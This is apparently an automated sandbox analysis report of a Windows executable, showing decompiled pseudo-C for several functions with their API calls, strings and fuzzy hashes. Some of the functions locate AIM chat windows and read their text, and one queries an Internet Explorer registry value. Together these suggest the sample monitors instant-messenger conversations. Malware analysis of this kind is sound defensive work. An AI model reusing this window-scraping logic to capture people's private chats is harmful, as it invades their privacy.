Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Process$CloseEnumFileHandleModuleModulesNameOpen
String ID: __oxFrame.class__
API String ID: 2971614962-3739978297
Opcode ID: b0029013f571fbc4080f54593d3533104bb06897c50c328326e4055854776487
Instruction ID: 7199bb29a34be87a96e7f4a403d50851ffc36b5799ec56518d247b7d088911db
Opcode Fuzzy Hash: b0029013f571fbc4080f54593d3533104bb06897c50c328326e4055854776487
Instruction Fuzzy Hash: 7501A276700214BBDB125B51EC09FAF3F68AB81B52F00406DFA05D9290DBB4D6409768

Uniqueness

Uniqueness Score: -1.00%

Function 00425403, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00425403(void* __ecx) {
				intOrPtr _t17;
				int _t18;
				signed int _t20;
				void* _t34;
				intOrPtr _t39;

				E0043E4E0(0x44297b, _t34);
				_t39 =  *0x455ae0; // 0x0
				if(_t39 == 0) {
					_push(0);
					E0041BFC6(_t34 - 0x18c);
					_push(__ecx + 0x1dcc);
					 *(_t34 - 4) = 0;
					L0043DDD2();
					_t17 =  *((intOrPtr*)(_t34 - 0xbc));
					__eflags =  *(_t17 - 8);
					if( *(_t17 - 8) != 0) {
						_t18 = SetForegroundWindow( *(__ecx + 0x20));
						_push(1);
						_pop(0);
						 *0x455ae0 = 0;
						L0043DE7A();
						__eflags = _t18;
						 *0x455ae0 = 0;
						if(_t18 != 0) {
							__eflags = 0;
						}
					} else {
						_push(1);
						_pop(0);
					}
					_t9 = _t34 - 4;
					 *_t9 =  *(_t34 - 4) | 0xffffffff;
					__eflags =  *_t9;
					E0041C073(_t34 - 0x18c,  *_t9);
					_t20 = 0;
				} else {
					_t20 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t34 - 0xc));
				return _t20;
			}

0x00425408
0x00425419
0x0042541f
0x00425425
0x0042542c
0x0042543d
0x0042543e
0x00425441
0x00425446
0x0042544c
0x0042544f
0x00425459
0x0042545f
0x00425467
0x00425468
0x0042546e
0x00425473
0x00425475
0x0042547b
0x0042547d
0x0042547d
0x00425451
0x00425451
0x00425453
0x00425453
0x0042547f
0x0042547f
0x0042547f
0x00425489
0x0042548e
0x00425421
0x00425421
0x00425421
0x00425495
0x0042549d

APIs

__EH_prolog.LIBCMT ref: 00425408
#860.MFC42(?,00000002), ref: 00425441

Strings

{)D, xrefs: 00425403

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #860H_prolog
String ID: {)D
API String ID: 2044854137-2450670785
Opcode ID: f2097b52c474d4f247b9546b8a1be85509677d34c0c3895d08f335ec67cacb27
Instruction ID: ce43c62490061b3583002702631966e2f5f4cbb70bc9c7782def522eb782dea8
Opcode Fuzzy Hash: f2097b52c474d4f247b9546b8a1be85509677d34c0c3895d08f335ec67cacb27
Instruction Fuzzy Hash: 9601D631A00A24EBCB21EB29EC417E9F7B4FB58751F5082AFE00693190DB745E81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041892F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041892F(intOrPtr* __ecx, void* __eflags) {
				void* __esi;
				void* _t24;
				void* _t25;
				intOrPtr* _t44;
				void* _t46;

				_t49 = __eflags;
				E0043E4E0(0x440f2f, _t46);
				_push(__ecx);
				_push( *((intOrPtr*)(_t46 + 8)));
				_t44 = __ecx;
				 *((intOrPtr*)(_t46 - 0x10)) = __ecx;
				_push(0x97);
				L0043E054();
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				_t24 = E0040CE10(__ecx + 0x60, __eflags);
				 *(_t46 - 4) = 1;
				_t25 = L00404F04(_t24, __ecx + 0x174, __ecx);
				 *(_t46 - 4) = 2;
				L00404F04(_t25, _t44 + 0x1c8, _t44);
				 *(_t46 - 4) = 3;
				E0040CE10(_t44 + 0x21c, _t49);
				 *(_t46 - 4) = 4;
				E0040CE10(_t44 + 0x330, _t49);
				 *(_t44 + 0x448) =  *(_t44 + 0x448) & 0x00000000;
				 *((intOrPtr*)(_t44 + 0x444)) = 0x44615c;
				 *(_t44 + 0x450) =  *(_t44 + 0x450) & 0x00000000;
				 *((intOrPtr*)(_t44 + 0x44c)) = 0x446a18;
				 *(_t46 - 4) = 7;
				 *_t44 = 0x447860;
				_push(CreateSolidBrush(0xefefef));
				L0043DD60();
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t44;
			}

0x0041892f
0x00418934
0x00418939
0x0041893c
0x0041893f
0x00418941
0x00418944
0x00418949
0x0041894e
0x00418955
0x00418960
0x00418964
0x0041896f
0x00418973
0x0041897e
0x00418982
0x0041898d
0x00418991
0x00418996
0x004189a3
0x004189a9
0x004189b6
0x004189c1
0x004189c5
0x004189d1
0x004189d4
0x004189e0
0x004189e8

APIs

__EH_prolog.LIBCMT ref: 00418934
#324.MFC42(00000097,?), ref: 00418949

Part of subcall function 0040CE10: __EH_prolog.LIBCMT ref: 0040CE15

CreateSolidBrush.GDI32(00EFEFEF), ref: 004189CB
#1641.MFC42(00000000), ref: 004189D4

Strings

C, xrefs: 004189A3

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: H_prolog$#1641#324BrushCreateSolid
String ID: C
API String ID: 766757258-2515487769
Opcode ID: b47630ff79c846175a8828a1059a76b92aa6eb59e309244597c3d4277e57a7c2
Instruction ID: 26ab5b58aa3bc6cf34b7af67da662e0d78b704631159f64622e9114ca185f942
Opcode Fuzzy Hash: b47630ff79c846175a8828a1059a76b92aa6eb59e309244597c3d4277e57a7c2
Instruction Fuzzy Hash: E711A3B5911744DFD325EB61C445BDDFBF4AF95308F00485EE65A63282CBB82608CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C655, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040C655(intOrPtr __ecx) {
				void* _t29;

				E0043E4E0(0x43fdca, _t29);
				_push(__ecx);
				 *((intOrPtr*)(_t29 - 0x10)) = __ecx;
				L0043DF64();
				 *((intOrPtr*)(__ecx)) = 0x446660;
				 *((intOrPtr*)(__ecx + 0x44)) = 0x44615c;
				 *((intOrPtr*)(_t29 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0;
				 *((char*)(_t29 - 4)) = 1;
				L0043DDD8();
				 *((char*)(_t29 - 4)) = 2;
				L0043E186();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0xc4)) = 0;
				 *((intOrPtr*)(__ecx + 0xb0)) = 0;
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x446590;
				 *((intOrPtr*)(__ecx + 0x40)) = 0xffffff;
				 *[fs:0x0] =  *((intOrPtr*)(_t29 - 0xc));
				return __ecx;
			}

0x0040c65a
0x0040c65f
0x0040c664
0x0040c667
0x0040c66c
0x0040c674
0x0040c67b
0x0040c67e
0x0040c684
0x0040c688
0x0040c690
0x0040c694
0x0040c69c
0x0040c69f
0x0040c6a5
0x0040c6ab
0x0040c6b1
0x0040c6b7
0x0040c6bd
0x0040c6c8
0x0040c6d0

APIs

__EH_prolog.LIBCMT ref: 0040C65A
#567.MFC42(?,?,?,0040CE26,?,?,00403F1E), ref: 0040C667
#540.MFC42(?,?,?,?,?,?,?,?,?,?,?,0040CE26,?,?,00403F1E), ref: 0040C688
#556.MFC42(?,?,?,?,?,?,?,?,?,?,?,0040CE26,?,?,00403F1E), ref: 0040C694

Strings

\aD, xrefs: 0040C674

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540#556#567H_prolog
String ID: \aD
API String ID: 344723303-2544947625
Opcode ID: 66f36a6bee566ff3a0a9933a2c0c3db2cc84fac04c353f19513d2bb60b19af02
Instruction ID: d0a53709eae4b21cf61fcb14e8fad21a042e3201f4444e74f7444a0a0ffee9f2
Opcode Fuzzy Hash: 66f36a6bee566ff3a0a9933a2c0c3db2cc84fac04c353f19513d2bb60b19af02
Instruction Fuzzy Hash: A40128B0801B54DBD720DF6AC50168AFBF8BF95704F00895FD09683791D7F86508CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFE1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AFE1() {
				void* _v8;
				int _v12;
				int _v16;
				signed int _v20;
				char _v24;

				E0041B133( &_v24);
				_v16 = _v16 & 0x00000000;
				_v12 = 8;
				RegCreateKeyA(0x80000001, "Software\\Microsoft\\Internet Explorer",  &_v8);
				if(RegQueryValueExA(_v8, "IEPK", 0,  &_v16,  &_v24,  &_v12) != 0) {
					_v20 = 5;
				}
				if(_v20 < 0) {
					_v20 = _v20 & 0x00000000;
				}
				RegCloseKey(_v8);
				return _v20;
			}

0x0041afea
0x0041afef
0x0041b001
0x0041b008
0x0041b02c
0x0041b02e
0x0041b02e
0x0041b039
0x0041b03b
0x0041b03b
0x0041b042
0x0041b04c

APIs

Part of subcall function 0041B133: memset.MSVCRT ref: 0041B13B
Part of subcall function 0041B133: time.MSVCRT ref: 0041B141

RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer,?), ref: 0041B008
RegQueryValueExA.ADVAPI32(?,IEPK,00000000,00000000,?,00000008), ref: 0041B024
RegCloseKey.ADVAPI32(?), ref: 0041B042

Strings

IEPK, xrefs: 0041B01C
Software\Microsoft\Internet Explorer, xrefs: 0041AFF7

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: CloseCreateQueryValuememsettime
String ID: IEPK$Software\Microsoft\Internet Explorer
API String ID: 2817275356-794077097
Opcode ID: 09d3c769bb5c674ec0ca2f19f50405c970d267488d14dae936480e6a984f255a
Instruction ID: 7a72d8f0bfb7c9a28e279d93d18db44e113eb126667b4210c368abc09a41bbc7
Opcode Fuzzy Hash: 09d3c769bb5c674ec0ca2f19f50405c970d267488d14dae936480e6a984f255a
Instruction Fuzzy Hash: F1F0EC7590020DEFEB10DFD0DD49BEEB7B8FB04309F10006AA511B11A0DBB56B59DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040972A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040972A(struct HWND__* _a4, char* _a8) {
				struct HWND__* _t7;
				struct HWND__* _t9;
				CHAR* _t12;

				if(_a4 != 0) {
					_t7 = strncmp(_a8, "AIM_IMessage", 0xc);
					if(_t7 != 0) {
						goto L1;
					}
					_t12 = "WndAte32Class";
					_t9 = FindWindowExA(_a4, _t7, _t12, _t7);
					if(_t9 == 0) {
						goto L1;
					}
					return FindWindowExA(_a4, _t9, _t12, 0) & 0xffffff00 | _t10 != 0x00000000;
				}
				L1:
				return 0;
			}

0x00409731
0x00409742
0x0040974d
0x00000000
0x00000000
0x00409755
0x00409761
0x00409765
0x00000000
0x00000000
0x00000000
0x00409773
0x00409733
0x00000000

APIs

strncmp.MSVCRT(?,AIM_IMessage,0000000C), ref: 00409742
FindWindowExA.USER32 ref: 00409761
FindWindowExA.USER32 ref: 0040976F

Strings

AIM_IMessage, xrefs: 00409739
WndAte32Class, xrefs: 00409755, 0040975B, 00409769

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$strncmp
String ID: AIM_IMessage$WndAte32Class
API String ID: 3975895692-2861659317
Opcode ID: bcb9bc4b83236d8f3166df2de34aa11bb6ad6806583d9a3a43f3b793b4c6ed9d
Instruction ID: c4442d600dddee87d0dd06869ef743fef577152b9be3bc3b4ce3ba8e991b27d9
Opcode Fuzzy Hash: bcb9bc4b83236d8f3166df2de34aa11bb6ad6806583d9a3a43f3b793b4c6ed9d
Instruction Fuzzy Hash: 8EF06531605211F6E6205F219C05F277FACDFD1791F118436BC40A31E7E2399D5A95B9

Uniqueness

Uniqueness Score: -1.00%

Function 00409A56, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409A56(void* __ecx) {
				void* _t18;
				signed int _t28;
				void* _t30;

				E0043E4E0(0x43f8e3, _t30);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t30 + 0xc);
				_t18 = E0040FEA7();
				_t28 = 1;
				_push(" - Conversation");
				 *(_t30 - 4) = _t28;
				L0043DFD6();
				_push(_t18);
				_push( *((intOrPtr*)(_t30 + 8)));
				L0043DFD0();
				 *(_t30 - 0x10) = _t28;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return  *((intOrPtr*)(_t30 + 8));
			}

0x00409a5b
0x00409a61
0x00409a66
0x00409a6c
0x00409a6d
0x00409a79
0x00409a7a
0x00409a7f
0x00409a82
0x00409a87
0x00409a8b
0x00409a8e
0x00409a93
0x00409a96
0x00409a9d
0x00409aa9
0x00409ab1

APIs

__EH_prolog.LIBCMT ref: 00409A5B

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42( - Conversation), ref: 00409A82
#4129.MFC42(?,00000000, - Conversation), ref: 00409A8E
#800.MFC42(?,00000000, - Conversation), ref: 00409A9D

Strings

- Conversation, xrefs: 00409A7A

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
String ID: - Conversation
API String ID: 2193304076-2140947825
Opcode ID: 9dad134e229cba4b68e483c7130fd4783a4c4238312140a6e0ad64e58becef09
Instruction ID: 31d8e53c20fe96153ca677803914aefb27190e56434720f7a48a11b6f2845888
Opcode Fuzzy Hash: 9dad134e229cba4b68e483c7130fd4783a4c4238312140a6e0ad64e58becef09
Instruction Fuzzy Hash: 70F03072800118BBDB15EF51D842BDE7B64EF18368F10D41FF4165A181DBBCA708CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004093BA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004093BA(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* __ebp;

				_v8 = _v8 & 0x00000000;
				if(FindWindowExA(E0040FE29(_a8, "AfxOleControl42", 1), 0, "#32770", 0) != 0) {
					_push(E0040FE29(_t8, "RichEdit20A", 0));
					_push(_a4);
					E0040FEA7();
				} else {
					_push(0x4550cc);
					L0043DE26();
				}
				return _a4;
			}

0x004093be
0x004093e6
0x00409404
0x00409405
0x00409408
0x004093e8
0x004093eb
0x004093f0
0x004093f0
0x00409414

APIs

Part of subcall function 0040FE29: FindWindowExA.USER32 ref: 0040FE43

FindWindowExA.USER32 ref: 004093DE
#537.MFC42(004550CC), ref: 004093F0

Strings

#32770, xrefs: 004093D6
RichEdit20A, xrefs: 004093F9
AfxOleControl42, xrefs: 004093C4

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$#537
String ID: #32770$AfxOleControl42$RichEdit20A
API String ID: 4245037527-1399439232
Opcode ID: 91a238a976119919419c5418a16c37f94979ac6b0c1ffb9c6be9c80ba4d8656c
Instruction ID: 47a9835690d0b86df55bc7f2cb184c89ea3d6b6ebbdb1a0ad95b7ff730b3190c
Opcode Fuzzy Hash: 91a238a976119919419c5418a16c37f94979ac6b0c1ffb9c6be9c80ba4d8656c
Instruction Fuzzy Hash: 79F0A070680304B7DB10BF61CC03F5F7A189B01B5EF20813AB804BA1D3D6BDEA18969C

Uniqueness

Uniqueness Score: -1.00%

Function 004094EF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E004094EF(void* __ecx) {
				void* _t18;
				signed int _t28;
				void* _t30;

				E0043E4E0(0x43f7c7, _t30);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t30 + 0xc);
				_t18 = E0040FEA7();
				_t28 = 1;
				_push(" - Instant");
				 *(_t30 - 4) = _t28;
				L0043DFD6();
				_push(_t18);
				_push( *((intOrPtr*)(_t30 + 8)));
				L0043DFD0();
				 *(_t30 - 0x10) = _t28;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return  *((intOrPtr*)(_t30 + 8));
			}

0x004094f4
0x004094fa
0x004094ff
0x00409505
0x00409506
0x00409512
0x00409513
0x00409518
0x0040951b
0x00409520
